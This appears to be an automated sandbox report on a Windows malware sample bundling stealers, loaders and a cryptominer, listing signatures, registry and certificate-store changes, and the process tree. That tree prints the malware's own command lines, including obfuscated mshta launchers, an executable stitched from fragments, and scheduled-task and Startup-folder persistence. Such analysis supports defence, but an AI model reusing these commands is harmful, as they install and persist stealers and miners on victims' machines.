Analysis Overview
SHA256
c329c73a0c1f6f156cc7a662abdf5e7ea30ed8b8f4b35253bf7f2435b83445c8
Threat Level: Known bad
The file c71460537b9584b5f550df694b80c9aa_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
OnlyLogger
GCleaner
Vidar
Amadey family
Onlylogger family
Fabookie family
Fabookie
Amadey
Gcleaner family
Vidar family
Xmrig family
Detect Fabookie payload
xmrig
Vidar Stealer
XMRig Miner payload
OnlyLogger payload
Blocklisted process makes network request
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Looks up external IP address via web service
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Program crash
System Time Discovery
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Modifies system certificate store
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-05 09:40
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-05 09:40
Reported
2024-12-05 09:42
Platform
win7-20241023-en
Max time kernel
149s
Max time network
151s
Signatures
Amadey
Amadey family
Detect Fabookie payload
Fabookie
Fabookie family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
Vidar
Vidar family
OnlyLogger payload
Vidar Stealer
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f77c275.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77c275.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC83E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC87D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC4C2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC7EE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC88E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC92B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77c276.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC80E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f77c276.ipi | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\lijun-game.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst001.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f7873aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
System Time Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [hex certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = [hex certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [hex certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [hex certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
C:\Users\Admin\AppData\Local\Temp\inst001.exe
"C:\Users\Admin\AppData\Local\Temp\inst001.exe"
C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7.exe
"C:\Users\Admin\AppData\Local\Temp\7.exe"
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
"C:\Users\Admin\AppData\Local\Temp\lijun-game.exe"
C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp" /SL5="$601CC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
"C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp" /SL5="$601EE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "sfx_123_206.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
C:\Windows\SysWOW64\control.exe
control ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 85C0DFAD51D9FC560EA58E8674CEF4C2 C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1464
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\78224359952.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\96758969264.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\83973314234.exe" /mix
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 1044
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\system32\taskeng.exe
taskeng.exe {966226A1-CBFB-44C8-97F7-47DE6F5BC114} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" AI_EUIMSI=1 APPDIR="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner" SECONDSEQUENCE="1" CLIENTPROCESSID="1044" CHAINERUIPROCESSID="1044Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature,RequiredApplication_1" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_PREREQFILES="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner%20Installation.exe" AI_PREREQDIRS="C:\Users\Admin\AppData\Roaming\Cleaner" AI_MISSING_PREREQS="Required Application" AI_DETECTED_INTERNET_CONNECTION="1" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733132187 " TARGETDIR="C:\" AI_INSTALL="1" AI_SETUPEXEPATH_ORIGINAL="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000584" "0000000000000528"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
